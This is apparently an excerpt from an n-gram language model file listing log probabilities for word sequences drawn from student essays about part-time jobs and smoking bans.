-0.50325936 a stimulant .
-0.50325936 not fair .
-0.50325936 own lifestyles .
-0.50325936 into account .
-0.50325936 be ignored .
-0.50325936 tobacco-related illnesses .
-1.5517123 three reasons it
-1.1186665 <s> While it
-0.95497584 nor can it
-0.8180224 disagree that it
-1.0054915 statement that it
-1.3052976 is that it
-0.6709817 , that it
-0.42752212 agree that it
-0.81400126 believe that it
-0.8180224 imply that it
-0.8180224 power that it
-1.2308744 think that it
-0.8180224 homework that it
-1.0916454 fact that it
-1.0916454 opinion that it
-0.94197637 f is it
-0.94197637 but is it
-0.94197637 or is it
-2.0104768 college student it
-1.4915415 job , it
-1.2763928 and , it
-1.2435931 course , it
-1.4696465 students , it
-1.3637582 Therefore , it
-1.4043024 college , it
-1.4307375 However , it
-1.2435931 activities , it
-1.3637582 life , it
-0.8632002 result , it
-1.113926 Secondly , it
-1.3170793 however , it
-1.1807604 year , it
-0.8632002 straightforward , it
-1.2435931 second , it
-0.8632002 enter , it
-1.0771625 Lastly , it
-0.93569726 First , it
-1.0771625 opinion , it
-0.8632002 wealthy , it
-0.8632002 Hence , it
-0.42878085 Zealand , it
-0.8632002 liked , it
-0.8632002 extremes , it
-0.77654874 smoke , it
-0.9246425 <s> and it
-0.9246425 valuable and it
-1.7451524 money and it
-1.1828005 responsibility and it
-1.1828005 wasted and it
-0.9246425 appetite and it
-0.9611059 any of it
-0.9595606 see to it
-0.9595606 violently to it
-0.9517632 occur from it
-1.3921618 by working it
-1.115167 distractions as it
-0.88602304 pressures as it
-1.115167 much as it
-0.88602304 expensive as it
-1.2043576 work there it
-2.5642097 college students it
-0.99991333 to accomplish it
-1.0570117 to leave it
-0.8994242 sought if it
-1.3362575 even if it
-1.7105911 , then it
-0.79590094 job but it
-1.1138029 , but it
-0.79590094 -- but it
-1.9592355 I agree it
-1.9183798 students have it
-1.7063701 extra money it
-1.1985786 <s> And it
-0.8668363 , making it
-1.4630674 for some it
-0.8651415 what does it
-0.9329084 major or it
-1.4347374 class or it
-0.49303538 and makes it
-0.42638204 environment makes it
-0.42638204 This makes it
-0.42638204 indirectly makes it
-0.9215721 by themselves it
-0.9333172 enter into it
-0.91616297 isn ft it
-1.1837178 and spend it
-1.3979636 to spend it
-1.5707034 <s> However it
-0.8435367 is doing it
-0.8435367 while doing it
-0.9460511 whatsoever when it
-1.1536856 often do it
-0.9083339 and do it
-1.2076522 to earn it
-0.9333344 So while it
-0.92086303 should take it
-0.8963454 we know it
-1.1725395 and what it
-0.91135865 of what it
-0.8321829 learn what it
-0.60934806 job because it
-0.7154875 is because it
-0.60934806 jobs because it
-0.60934806 responsibility because it
-0.60934806 ages because it
-1.2274874 of them it
-1.3135337 <s> If it
-0.83382165 for whatever it
-0.5354339 <s> Because it
-1.7679867 to get it
-0.6127273 and how it
-1.0427647 I believe it
-1.3875618 to make it
-1.0579593 should make it
-1.5707034 <s> Firstly it
-1.1704433 of living it
-1.3914112 , however it
-0.92679805 point where it
-0.6780335 often find it
-0.80527925 students find it
-0.6780335 or find it
-0.9452322 I feel it
-0.6777468 people feel it
-0.98160887 <s> So it
-0.69641256 than hinder it
-0.91313225 and getting it
-0.99038965 to try it
-0.8668363 hopefully appreciate it
-0.5148094 I think it
-1.010676 not think it
-0.69641256 Everyone knows it
-0.7667724 , yet it
-0.5354339 time ... it
-0.8981341 personal opinion it
-0.5354339 to rush it
-1.1186665 <s> Although it
-0.5354339 would deem it
-0.5354339 to repay it
-0.8386012 completely banning it
-0.5354339 because nowadays it
-2.5190015 <s> I can
-0.8857135 The statement can
-0.89159304 reasons it can
-0.89159304 While it can
-1.791068 , it can
-1.4032463 and it can
-1.5351136 skills that can
-0.93774277 someone that can
-0.93774277 gains that can
-1.8358839 a job can
-1.2886233 part-time job can
-1.4210838 time job can
-0.8911071 studying full-time can
-2.050851 a student can
-2.0094023 the student can
-1.7493175 studies , can
-1.2527076 one , can
-2.1385717 , and can
-0.9478223 now and can
-0.9478223 manner and can
-1.3447253 of study can
-1.1133463 of studying can
-0.8657286 while studying can
-1.2298374 This experience can
-1.3494016 , students can
-1.1748081 and students can
-2.1378505 college students can
-0.9202135 believe students can
-2.562944 part time can
-0.94386005 This time can
-1.7207611 part-time jobs can
-1.3471756 time jobs can
-0.880733 Student jobs can
-0.83394766 that one can
-1.122046 , one can
-0.83394766 where one can
-1.4856735 at school can
-1.2161113 course work can
-1.6249113 hard work can
-0.95404977 what money can
-1.0187029 that they can
-0.8910716 , they can
-1.329574 as they can
-1.5551031 if they can
-0.5060517 so they can
-1.049392 people they can
-1.2729213 where they can
-1.581983 that you can
-0.8782071 These experiences can
-0.6974243 academic qualification can
-0.80805176 service organization can
-1.1600474 the environment can
-1.9643993 <s> There can
-0.9342319 whose parents can
-0.94889486 that people can
-1.5617176 <s> They can
-1.3956043 <s> This can
-1.1213467 <s> People can
-0.99214834 this area can
-0.80805176 customer nor can
-1.3857073 <s> It can
-1.0593362 and colleges can
-0.9247814 <s> how can
-0.9493795 enjoying life can
-0.8350799 the result can
-0.74106234 experience which can
-0.8920372 skills which can
-0.8920372 something which can
-0.74106234 responsibilities which can
-1.069079 a family can
-0.8058585 every family can
-1.0320432 this period can
-0.885046 qualified professional can
-0.87611413 If someone can
-0.9306293 that matter can
-0.8350799 and back can
-1.0019507 <s> Jobs can
-1.4736953 a person can
-0.536132 added self-esteem can
-0.8350799 and drinking can
-0.6974243 Such connections can
-0.6974243 's coursework can
-0.9033973 skills he can
-0.8934511 young age can
-0.8962261 money we can
-0.8962261 what we can
-0.536132 few bucks can
-0.6974243 The damage can
-0.6974243 a professor can
-1.0985031 at large can
-0.536132 shop owners can
-0.536132 Idle minds can
-0.6974243 These individuals can
-0.6974243 This relief can
-0.6974243 and bars can
-1.6872208 to smoke can
-0.536132 <s> Nothing can
-0.536132 <s> Smokers can
-0.9613249 can it be
-0.5904652 statement can be
-0.75249493 it can be
-0.44796956 that can be
-0.8953602 job can be
-0.5904652 full-time can be
-0.3375865 , can be
-0.3375865 study can be
-0.3375865 time can be
-0.5904652 school can be
-0.69151884 work can be
-0.5904652 qualification can be
-0.5904652 There can be
-0.731204 This can be
-0.5904652 area can be
-0.44796956 It can be
-0.75249493 which can be
-0.5904652 bucks can be
-0.5904652 damage can be
-0.5904652 bars can be
-2.3161147 a student be
-0.97020364 that will be
-0.97396755 job will be
-0.93338394 student will be
-0.91396713 , will be
-0.8280984 there will be
-0.9910503 students will be
-0.93338394 jobs will be
-0.91396713 college will be
-0.6379098 they will be
-0.8280984 employers will be
-0.6949426 There will be
-0.6949426 families will be
-0.8280984 we will be
-1.545812 course , be
-0.9649224 interests , be
-1.2003063 can often be
-0.55801034 can not be
-1.1179022 will not be
-0.67315096 may not be
-0.806374 otherwise not be
-0.7118058 should not be
-0.806374 might not be
-0.98768264 would not be
-0.806374 probably not be
-1.7056035 education and be
-1.2798102 reasons to be
-1.4236912 is to be
-1.5023708 student to be
-0.78237873 and to be
-1.5282325 time to be
-1.2119194 necessary to be
-0.7872396 enough to be
-1.4546759 need to be
-1.4069595 learn to be
-1.1015195 lessons to be
-0.87791914 years to be
-0.87791914 lesson to be
-1.2798102 means to be
-0.42729965 needs to be
-0.5938167 likely to be
-1.1015195 try to be
-1.1015195 responsibility to be
-0.87791914 wisdom to be
-0.87791914 employees to be
-0.87791914 shown to be
-0.81793046 can also be
-0.52540714 will also be
-0.7314308 may also be
-0.38945368 should also be
-0.7314308 must also be
-0.87846375 would also be
-1.4205849 first time be
-0.41237834 it may be
-0.46266088 experience may be
-0.8505125 students may be
-0.6157012 but may be
-0.6157012 college may be
-0.78964293 they may be
-0.6157012 do may be
-0.6157012 income may be
-0.6157012 workplace may be
-0.93739694 would otherwise be
-0.34155363 it should be
-0.48884022 that should be
-0.4182371 student should be
-0.4227813 study should be
-0.4227813 studying should be
-0.4227813 restaurant should be
-0.6256627 students should be
-0.48884022 work should be
-0.4227813 such should be
-0.4201718 they should be
-0.4227813 people should be
-0.52606475 They should be
-0.26153165 College should be
-0.26153165 It should be
-0.26153165 life should be
-0.4227813 courses should be
-0.52606475 Students should be
-0.4227813 Jobs should be
-0.5339085 we should be
-0.4227813 deviation should be
-0.4227813 activity should be
-0.13931742 smoking should be
-0.4227813 Smoking should be
-0.4227813 tobacco should be
-1.0153741 can only be
-1.1557078 will only be
-1.0153741 should only be
-1.5583255 <s> To be
-0.8722903 not even be
-1.0921409 may even be
-0.9345244 must first be
-1.0170925 can ft be
-0.82552093 won ft be
-0.5660162 this could be
-0.6977501 that could be
-0.6608859 study could be
-0.5660162 studies could be
-0.5660162 jobs could be
-0.5660162 solution could be
-0.5660162 Which could be
-0.9539855 not all be
-0.6007683 <s> must be
-0.7455161 student must be
-0.6007683 There must be
-0.6007683 Workers must be
-0.7045622 Students must be
-1.1442492 wo n't be
-0.8583598 what might be
-0.6041735 it would be
-0.57421464 , would be
-0.38924602 study would be
-0.4950434 there would be
-0.6041735 students would be
-0.4950434 then would be
-0.57421464 It would be
-0.4950434 finances would be
-0.4950434 store would be
-0.29627293 Students would be
-0.4950434 choice would be
-0.57421464 restaurants would be
-0.88403475 can however be
-0.8911713 will never be
-1.1233201 not just be
-0.5388479 could preciously be
-0.4402455 will always be
-0.8715348 should actually be
-0.8715348 allow us be
-0.83942044 will certainly be
-0.5388479 ` t be
-0.70136726 misogyny \ be
-2.066828 can be argued
-1.8067875 also be argued
-1.5056869 I disagree that
-0.7021219 the statement that
-1.4723728 job for that
-0.94441175 full-time for that
-0.93551975 my reasons that
-1.1957684 to it that
-1.4310732 makes it that
-0.31214613 be argued that
-0.95242125 points that that
-1.1618578 a job that
-1.8034397 part-time job that
-1.3095354 full-time job that
-1.4749159 time job that
-1.1752357 first job that
-1.3108716 this is that
-1.7471848 it is that
-1.0021493 , is that
-0.89828086 reason is that
-0.5865438 jobs is that
-1.0735788 school is that
-1.0735788 way is that
-0.5865438 point is that
-0.861007 here is that
-1.2383459 smoking is that
-2.1362226 a student that
-0.92819893 on , that
-1.1892664 then , that
-1.7036616 money , that
-0.92819893 say , that
-1.5355258 however , that
-1.1892664 opinion , that
-1.3287644 Furthermore , that
-0.92819893 demanding , that
-1.8356706 is not that
-1.2305553 the case that
-0.917871 and employment that
-1.9181563 job in that
-1.6796713 , and that
-1.4232886 experience and that
-0.9292705 compounded and that
-0.9292705 places and that
-1.3960968 top of that
-0.8246526 a nature that
-1.22666 unrelated to that
-0.94829816 adding to that
-0.94829816 admitted to that
-1.4852856 of course that
-0.93478733 hard study that
-0.81595004 acquire experience that
-1.0023046 and experience that
-1.300666 work experience that
-0.81595004 worthwhile experience that
-1.4007254 this reason that
-1.5652962 that students that
-1.447254 many students that
-0.8704389 some students that
-1.2575127 gives students that
-0.89845586 A students that
-1.4849237 their studies that
-1.5279263 study time that
-1.4436386 free time that
-1.0785748 part-time jobs that
-0.87164164 in jobs that
-0.87164164 The jobs that
-1.1993265 is one that
-1.201165 particular school that
-1.7695034 part-time work that
-1.2004569 Part-time work that
-0.8999258 benefits being that
-0.9374747 decide if that
-0.86349785 epeople-skills f that
-0.93368185 is such that
-0.92375785 dishes but that
-0.5980288 I agree that
-0.86938024 strongly agree that
-1.8414453 the money that
-0.4420721 to say that
-0.4420721 people say that
-0.4420721 would say that
-1.568508 <s> And that
-0.93128175 education so that
-0.5303195 the advertisements that
-1.0638313 part-time positions that
-0.797243 out ways that
-0.8676183 The experiences that
-0.864944 Some benefits that
-0.79972905 valuable skill that
-0.9127906 far better that
-0.82254535 or industry that
-0.7490672 with skills that
-0.7490672 The skills that
-0.7490672 life skills that
-0.7490672 countless skills that
-0.7490672 learn skills that
-1.9959812 is important that
-1.5975901 very important that
-1.1361053 an environment that
-0.5303195 students complain that
-0.9144017 justified enough that
-1.3134401 the food that
-1.3870778 the idea that
-1.0692879 your parents that
-0.85837185 our parents that
-0.85662746 interpersonal relationships that
-1.5194669 of people that
-0.8533913 they see that
-1.0124757 to show that
-0.44295323 is something that
-0.58198553 studying something that
-0.71952224 do something that
-0.7521441 to know that
-0.97518206 n't know that
-0.75809586 The opportunities that
-1.5203687 of all that
-1.7112169 to get that
-0.84210014 the club that
-0.9157236 genuine activities that
-0.8533913 unmotivated workers that
-1.1034592 the demands that
-0.35404378 I believe that
-0.26092857 also believe that
-0.42157966 ft believe that
-0.13904124 strongly believe that
-0.42157966 really believe that
-0.42157966 truly believe that
-0.42157966 firmly believe that
-0.7197185 fs life that
-1.1476376 about life that
-1.2793947 additional responsibilities that
-0.75809586 more aware that
-0.84027153 only factor that
-1.4062219 work force that
-1.181169 work world that
-0.5303195 the consequence that
-0.9221272 pointed out that
-0.9163531 and energy that
-0.86349785 over someone that
-0.8550063 and feel that
-0.75809586 in subjects that
-1.2604542 more than that
-0.84074193 story than that
-0.5303195 to imply that
-0.87283367 fs just that
-0.9163531 a lesson that
-0.3523021 I understand that
-0.62763685 not understand that
-0.62763685 also understand that
-0.6890228 of power that
-0.82254535 a system that
-0.84210014 the effect that
-0.5303195 We hope that
-0.5303195 it follows that
-1.0485353 health problems that
-0.5303195 unfathomable waters that
-0.6457592 , things that
-0.7625431 other things that
-0.6457592 difficult things that
-0.6457592 out things that
-1.5812865 <s> Students that
-0.6578134 I think that
-0.5149696 also think that
-0.5149696 you think that
-0.5149696 who think that
-0.30532625 ft think that
-0.67113674 , anything that
-0.67113674 learn anything that
-0.6890228 people argue that
-1.2010198 is why that
-1.1517092 doing homework that
-0.75809586 eat lunch that
-0.38642544 to realize that
-0.38642544 them realize that
-0.38642544 Japan realize that
-0.75809586 may discover that
-0.5303195 by saying that
-0.27384815 the fact that
-1.0347471 the opinion that
-0.7993897 my opinion that
-0.82254535 a policy that
-0.5303195 potential gains that
-0.6890228 many points that
-0.31214613 my belief that
-0.6890228 no doubt that
-1.0993952 <s> With that
-0.5303195 same field\/industry that
-0.9207234 it seems that
-0.6890228 plainly seen that
-0.82254535 have employees that
-0.5303195 employer feels that
-0.5303195 These structures that
-0.5303195 good life-lesson that
-0.5303195 fs self that
-0.5303195 highly recommend that
-0.5303195 and burdens that
-0.5303195 character-building aspect that
-0.7611268 be said that
-0.5303195 also seemed that
-0.5303195 the media that
-0.6890228 so popular that
-0.5303195 <s> Assuming that
-0.6890228 the goals that
-0.5303195 ceaseless cogitation that
-0.5303195 should assume that
-0.5303195 have heard that
-0.96308273 associated with having
-1.9715892 , for having
-1.6053296 reason for having
-1.2441112 argued that having
-2.099288 believe that having
-0.9601871 provides is having
-0.9601871 challenge is having
-1.2090404 that , having
-1.9032536 job , having
-1.4541466 course , having
-1.7609243 Firstly , having
-1.239839 Secondly , having
-1.6728699 First , having
-1.4541466 hand , having
-0.9389273 dimension , having
-1.2554793 of not having
-0.95593876 money by having
-1.3819263 study and having
-1.6737382 studies and having
-0.94856316 huge and having
-1.3819263 class and having
-1.54152 experience of having
-1.54152 importance of having
-1.5279936 years of having
-0.93955064 practice of having
-1.4561914 instead of having
-0.6302723 benefits to having
-2.6743803 college students having
-0.9450255 salary but having
-1.5244596 I believe having
-1.1377846 <s> Not having
-0.81270057 environment without having
-0.81270057 earn without having
-0.8855846 choose between having
-1.1889553 not think having
-0.8747608 of actually having
-0.9463183 up with a
-0.77868885 fill with a
-0.9463183 cope with a
-1.0205005 out with a
-0.77868885 those with a
-0.77868885 schedule with a
-0.5973811 dealing with a
-0.77868885 communicating with a
-1.1257546 statement for a
-1.0040727 preparation for a
-0.9006014 studying for a
-1.0040727 working for a
-0.9006014 school for a
-1.0280923 money for a
-0.9006014 foundation for a
-1.6716337 important for a
-1.1257546 them for a
-0.7470942 fit for a
-0.7470942 day for a
-0.7470942 handle for a
-0.7470942 conditions for a
-0.9006014 right for a
-0.9667752 look for a
-0.7470942 expense for a
-0.7470942 options for a
-0.7470942 Searching for a
-0.7470942 ideal for a
-0.94060874 how can a
-0.96860355 can be a
-1.3518808 to be a
-0.69459635 also be a
-1.2592882 may be a
-1.2321413 should be a
-0.9826158 ft be a
-1.1768022 must be a
-0.8030299 however be a
-0.8030299 us be a
-1.6434534 is that a
-1.2846122 say that a
-1.0817838 believe that a
-0.91010344 heard that a
-0.44783682 for having a
-0.24339184 that having a
-0.44783682 is having a
-0.19811971 , having a
-0.47444984 of having a
-0.24339184 to having a
-0.24339184 believe having a
-0.38733426 between having a
-0.38733426 think having a
-0.38733426 actually having a
-2.2963576 part-time job a
-0.97721606 this is a
-0.98941046 it is a
-1.0355538 that is a
-1.0525014 job is a
-0.71169424 working is a
-0.5697588 there is a
-0.9959183 time is a
-0.85102165 school is a
-0.85102165 only is a
-0.9420672 money is a
-0.71169424 option is a
-1.0484575 There is a
-0.71383274 This is a
-0.68053716 College is a
-0.71169424 done is a
-0.6859554 It is a
-0.96281344 life is a
-0.71169424 cards is a
-1.0023357 which is a
-0.85102165 way is a
-0.90955126 education is a
-0.71169424 ethics is a
-0.71169424 burgers is a
-0.71169424 made is a
-0.71169424 Failure is a
-0.71169424 restaurants is a
-0.6005122 smoke is a
-0.71169424 premise is a
-2.0335855 the student a
-1.5864897 job , a
-0.8860731 case , a
-1.0490814 example , a
-1.4342254 Therefore , a
-1.2297088 tuition , a
-1.0716677 Firstly , a
-1.1152519 Often , a
-1.1504664 Secondly , a
-1.3495991 Thirdly , a
-1.1152519 Lastly , a
-1.2297088 Japan , a
-1.454469 First , a
-1.1152519 independence , a
-1.2297088 Second , a
-1.3006831 hand , a
-0.8860731 front , a
-0.8860731 Consequently , a
-0.90565085 fs often a
-1.5734345 is not a
-1.588621 are not a
-0.8980127 If not a
-1.810451 <s> In a
-0.7823678 the cases a
-0.7823678 certain cases a
-1.053841 obtained by a
-0.84880257 entirely by a
-0.84880257 subsidized by a
-0.718338 be in a
-0.8602051 part-time in a
-0.718338 studying in a
-0.3399794 working in a
-0.718338 waiter in a
-1.0982568 students in a
-0.92007583 on in a
-1.0351849 time in a
-0.718338 one in a
-0.718338 resulting in a
-0.6643399 work in a
-0.5186932 well in a
-0.83076644 are in a
-0.718338 whether in a
-0.718338 skills in a
-0.718338 position in a
-0.718338 spend in a
-0.8602051 graduates in a
-0.8602051 period in a
-0.718338 factors in a
-0.718338 someone in a
-0.8602051 participation in a
-0.8602051 Working in a
-0.718338 dishes in a
-0.8602051 point in a
-0.718338 mistakes in a
-0.718338 Being in a
-1.4662038 job and a
-1.7221913 , and a
-1.3409965 school and a
-1.1411275 others and a
-1.1411275 expenses and a
-1.1411275 professional and a
-0.9011515 hours and a
-1.1187395 that of a
-0.8067825 and of a
-0.8067825 less of a
-1.3970195 part of a
-0.41296336 demands of a
-0.9883029 ability of a
-0.9883029 burden of a
-1.383051 cost of a
-0.73467326 importance of a
-1.6377094 value of a
-0.8067825 determination of a
-1.1187395 lack of a
-0.66171676 purpose of a
-0.9883029 waste of a
-0.8067825 frustration of a
-1.1187395 members of a
-0.8067825 manager of a
-0.8067825 path of a
-0.8067825 pressure of a
-0.8067825 acquisition of a
-0.8067825 minimum of a
-1.1187395 effects of a
-1.5717438 important to a
-0.90442413 keeping to a
-1.0972198 lead to a
-1.1853063 going to a
-1.5366107 go to a
-0.90442413 given to a
-0.90442413 assistant to a
-1.350067 due to a
-0.90442413 supplementary to a
-0.90442413 conducive to a
-1.1468302 opposed to a
-0.7913871 student has a
-0.7913871 individual has a
-0.7913871 air has a
-0.9336654 may experience a
-0.75180066 can gain a
-0.79771787 and gain a
-0.6395066 to gain a
-0.84516895 working from a
-1.0480295 benefit from a
-0.84516895 come from a
-0.84516895 comprehend from a
-1.079625 that working a
-0.8504998 , working a
-1.0111625 by working a
-0.76166815 from working a
-1.0645251 By working a
-0.7733132 ever working a
-0.5868115 part-time as a
-0.686913 job as a
-0.686913 experience as a
-0.5868115 working as a
-0.5868115 you as a
-0.686913 or as a
-0.5868115 themselves as a
-0.5868115 position as a
-0.5868115 times as a
-0.5868115 society as a
-0.5868115 generated as a
-0.5868115 interests as a
-0.5868115 come as a
-0.5868115 Working as a
-0.5868115 serve as a
-0.5868115 days as a
-0.5868115 together as a
-0.5868115 seen as a
-0.5868115 finally as a
-0.5868115 hobbies as a
-1.3226923 gives students a
-1.3226923 give students a
-1.4313142 allows students a
-1.0391068 <s> Such a
-0.6833472 often mean a
-1.1533704 it on a
-1.1533704 job on a
-1.2955194 , on a
-0.42515737 takes on a
-0.8498009 invaluable on a
-0.75526106 is also a
-0.8914721 also also a
-0.9740218 to accomplish a
-1.4891031 to work a
-0.8404194 then work a
-0.8404194 only work a
-0.8404194 To work a
-0.8404194 through work a
-0.8404194 hand work a
-1.0818121 of being a
-0.78838515 from being a
-1.1081296 that if a
-0.86440694 , if a
-0.8267235 desirable if a
-0.667964 having such a
-0.667964 find such a
-0.667964 learn such a
-0.667964 behoove such a
-0.667964 implementing such a
-1.5998961 , then a
-0.8322533 than pursuing a
-0.89810765 ft pay a
-0.8559058 can have a
-0.9151446 that have a
-0.73738813 will have a
-0.493793 not have a
-0.202698 to have a
-1.0427289 students have a
-0.7152325 also have a
-0.6936333 should have a
-0.8559058 only have a
-0.9151446 you have a
-0.96914184 who have a
-0.99588823 ft have a
-0.7152325 fll have a
-0.9156101 gives you a
-0.85122377 of making a
-1.0795275 world following a
-1.4467794 <s> To a
-0.8407426 , become a
-0.509442 to become a
-0.6833472 not guarantee a
-1.2733552 job or a
-1.4723481 , or a
-0.86183906 family or a
-1.074937 company or a
-1.4762473 , even a
-1.3461058 there are a
-1.3131471 jobs are a
-1.3935848 you are a
-1.6553884 There are a
-1.093631 finances are a
-0.5645089 <s> As a
-0.5930753 , As a
-0.86464363 could offer a
-0.9243449 or more a
-0.6341425 of whether a
-0.6341425 decide whether a
-0.9422763 students taking a
-0.775937 since taking a
-0.82342994 met through a
-0.82342994 Working through a
-0.6866503 directly into a
-0.816869 insight into a
-0.6866503 converted into a
-0.6866503 turn into a
-0.704525 be at a
-0.704525 little at a
-0.704525 usually at a
-0.704525 week at a
-0.704525 home at a
-0.704525 look at a
-0.704525 me at a
-0.704525 dealing at a
-0.12762828 <s> Having a
-0.9149432 ft need a
-0.89223915 seem like a
-1.1636549 , doing a
-1.1636549 and doing a
-0.9324855 even when a
-0.72627777 to earn a
-0.8949397 to take a
-0.81632745 you take a
-0.8391622 last chance a
-1.1008759 will know a
-0.9243657 appreciate what a
-0.99457824 gives them a
-1.1935583 give them a
-0.99457824 make them a
-0.81090385 giving them a
-0.5101422 can provide a
-0.83762616 to provide a
-0.83762616 also provide a
-0.8637705 <s> If a
-0.48962295 can get a
-0.58585244 will get a
-0.61665446 and get a
-0.5855448 to get a
-0.50472003 should get a
-0.5167513 they get a
-0.50472003 could get a
-0.58585244 them get a
-0.50472003 ultimately get a
-0.50472003 actually get a
-1.4726713 I believe a
-1.0727439 are entering a
-1.04039 , particularly a
-0.91565967 picking up a
-0.9063969 and make a
-1.2048371 while still a
-1.1440232 is quite a
-0.812417 <s> Maintaining a
-0.8228196 of managing a
-0.37295055 at least a
-0.85504335 having been a
-0.8244397 work during a
-0.8244397 lifestyle during a
-0.82537234 , earning a
-0.6929347 and earning a
-0.6418105 to lead a
-0.95612603 may lead a
-1.0817583 to enjoy a
-0.7589079 them enjoy a
-0.8558506 universities once a
-0.6833472 businesses require a
-0.86291385 may force a
-1.1899884 tertiary education a
-0.78997475 in balancing a
-0.38434345 , finding a
-0.38434345 in finding a
-0.38434345 of finding a
-0.6341425 job provides a
-0.6341425 experience provides a
-0.81484497 help improve a
-0.812417 <s> Without a
-0.8569548 should place a
-0.84690464 taking out a
-0.84690464 filling out a
-1.1576419 is where a
-0.7514494 , giving a
-0.8857684 to find a
-0.7899939 should find a
-0.812417 <s> Should a
-0.78997475 It requires a
-0.8986702 adequately support a
-0.81484497 will last a
-0.7514494 start building a
-1.3197943 they learn a
-0.5263734 to pursue a
-0.9049061 less than a
-1.1678841 to enter a
-0.31040567 to secure a
-1.2287464 to meet a
-1.1969007 I worked a
-0.85338986 studying costs a
-0.5620173 for getting a
-0.5620173 , getting a
-0.5620173 to getting a
-0.5620173 just getting a
-0.81484497 should hold a
-0.94065803 few hours a
-0.774833 40 hours a
-0.886487 5 days a
-0.7554748 high risk a
-0.5315993 that adding a
-0.45924574 By adding a
-0.6833472 to securing a
-0.7514494 I studied a
-0.66605204 student obtain a
-0.8845122 to obtain a
-0.7514494 studies -- a
-0.6833472 it instils a
-0.5263734 and opens a
-0.7514494 have yet a
-0.7514494 for planning a
-0.812417 <s> Taking a
-0.7514494 on developing a
-0.7514494 , sometimes a
-0.6833472 fs generations a
-1.0165938 <s> On a
-1.258421 to balance a
-0.22965625 in becoming a
-0.22965625 and becoming a
-0.22965625 to becoming a
-0.22965625 fast becoming a
-1.1678841 to develop a
-1.246687 <s> When a
-0.9068164 to receive a
-1.0924006 I had a
-0.7937406 not had a
-0.78997475 If given a
-0.6833472 few nights a
-0.5930753 work within a
-0.5930753 together within a
-0.6833472 it profit a
-0.45924574 This puts a
-0.45924574 institutes puts a
-0.86464363 made me a
-0.6833472 on seeing a
-0.78997475 little over a
-0.5263734 already experienced a
-0.53794885 in creating a
-0.53794885 even creating a
-0.5263734 to gauge a
-0.5263734 have devised a
-0.5263734 student deserves a
-0.6833472 , purchase a
-0.6833472 to demand a
-0.5263734 , seeking a
-0.6833472 can challenge a
-0.812417 <s> Doing a
-0.45924574 world obtaining a
-0.45924574 without obtaining a
-0.5263734 greatest assets a
-0.6833472 income supporting a
-0.6833472 job creates a
-0.5263734 it yields a
-0.6833472 <s> Yet a
-0.5263734 will deter a
-0.5263734 job poses a
-0.45924574 hold down a
-0.45924574 holding down a
-0.5263734 and landing a
-0.5263734 to train a
-0.5263734 to forgo a
-0.5263734 ever known a
-0.5263734 to flip a
-0.5263734 to sustain a
-0.45924574 that holding a
-0.45924574 of holding a
-0.5263734 to supply a
-0.5263734 and hold-down a
-0.5263734 To coin a
-0.5263734 <s> Obliging a
-0.5263734 <s> Implementing a
-0.6833472 does affect a
-0.6833472 like inhaling a
-0.5263734 passively contracting a
-0.95469683 arrange for part-time
-0.95469683 availability for part-time
-0.8965591 had several part-time
-1.2854022 say that part-time
-0.91043675 experiences that part-time
-1.157392 belief that part-time
-0.91043675 doubt that part-time
-0.91043675 aspect that part-time
-0.9394996 students having part-time
-1.1435484 that a part-time
-0.20435277 having a part-time
-1.0257795 is a part-time
-0.66151166 , a part-time
-1.1086023 in a part-time
-1.0791117 and a part-time
-1.2424343 of a part-time
-0.90821856 working a part-time
-1.2293094 if a part-time
-0.7576475 then a part-time
-0.36055943 have a part-time
-1.0233345 or a part-time
-0.7576475 even a part-time
-0.9157078 whether a part-time
-0.28305605 Having a part-time
-0.9157078 doing a part-time
-0.53855455 take a part-time
-1.3084906 If a part-time
-1.2766547 get a part-time
-0.7576475 Maintaining a part-time
-0.7576475 managing a part-time
-0.7576475 where a part-time
-0.7576475 worked a part-time
-0.63068616 getting a part-time
-0.7576475 hold a part-time
-0.7576475 risk a part-time
-0.9157078 adding a part-time
-0.7576475 Taking a part-time
-0.7576475 sometimes a part-time
-0.9157078 had a part-time
-0.7576475 seeking a part-time
-0.7576475 Doing a part-time
-0.9157078 down a part-time
-0.39795253 holding a part-time
-0.7576475 hold-down a part-time
-2.2820241 , the part-time
-2.027672 at the part-time
-1.3858186 Moreover , part-time
-1.8317215 However , part-time
-0.9499941 subject , part-time
-0.9499941 scale , part-time
-0.78769267 Finally , part-time
-2.0259588 are not part-time
-1.5639628 , many part-time
-0.9467805 , any part-time
-0.9467805 from any part-time
-0.77900296 against any part-time
-0.7522525 engage in part-time
-1.7522188 studies and part-time
-1.5293045 experience of part-time
-1.3488836 type of part-time
-0.9360869 balance of part-time
-0.9360869 favor of part-time
-1.4449126 form of part-time
-0.96571416 look to part-time
-0.9614904 select their part-time
-1.2798676 , working part-time
-0.81824607 course working part-time
-1.0920655 students working part-time
-0.81824607 Students working part-time
-0.81824607 currently working part-time
-0.87553394 I work part-time
-1.206789 can work part-time
-1.6209877 to work part-time
-0.87553394 therefore work part-time
-1.206789 days work part-time
-0.77080154 but otherwise part-time
-0.9430868 get only part-time
-1.2058669 that have part-time
-1.584675 not have part-time
-1.0177239 to have part-time
-1.4711833 students have part-time
-0.79304624 should have part-time
-1.6544564 <s> And part-time
-1.1194972 to offer part-time
-1.531082 <s> These part-time
-1.1896515 learned through part-time
-1.2971555 their first part-time
-1.0655015 my first part-time
-2.053652 <s> This part-time
-1.3868866 we do part-time
-1.6261486 to take part-time
-0.6998367 one works part-time
-0.85558045 <s> A part-time
-0.834762 to fill part-time
-1.6502413 their own part-time
-1.595122 to find part-time
-1.1046036 The best part-time
-1.4616855 so much part-time
-1.2503716 I worked part-time
-0.9177244 than getting part-time
-0.6998367 their so-called part-time
-0.96171606 <s> Working part-time
-0.68080556 : Working part-time
-0.5377946 an average part-time
-1.1277791 <s> Although part-time
-0.77080154 an appropriate part-time
-1.171514 students had part-time
-0.5377946 conveniently located part-time
-0.5377946 to take-up part-time
-0.6998367 often seek part-time
-0.6998367 very lucrative part-time
-1.3332454 with a job
-1.3843993 for a job
-1.0557996 having a job
-1.504018 , a job
-1.4567358 in a job
-1.2752383 and a job
-0.8983592 of a job
-1.0527124 to a job
-0.4225447 Such a job
-1.2280369 such a job
-0.8403227 guarantee a job
-1.190565 or a job
-1.5974905 Having a job
-0.54030913 get a job
-0.5774287 finding a job
-1.0403234 adding a job
-1.0403234 obtain a job
-0.8403227 balance a job
-0.8403227 deserves a job
-1.0403234 down a job
-0.015545427 a part-time job
-0.64203715 the part-time job
-0.4241638 any part-time job
-0.64203715 in part-time job
-0.81574017 of part-time job
-0.32103842 first part-time job
-0.5508023 This part-time job
-0.16555339 A part-time job
-0.5508023 own part-time job
-0.5508023 best part-time job
-0.5508023 average part-time job
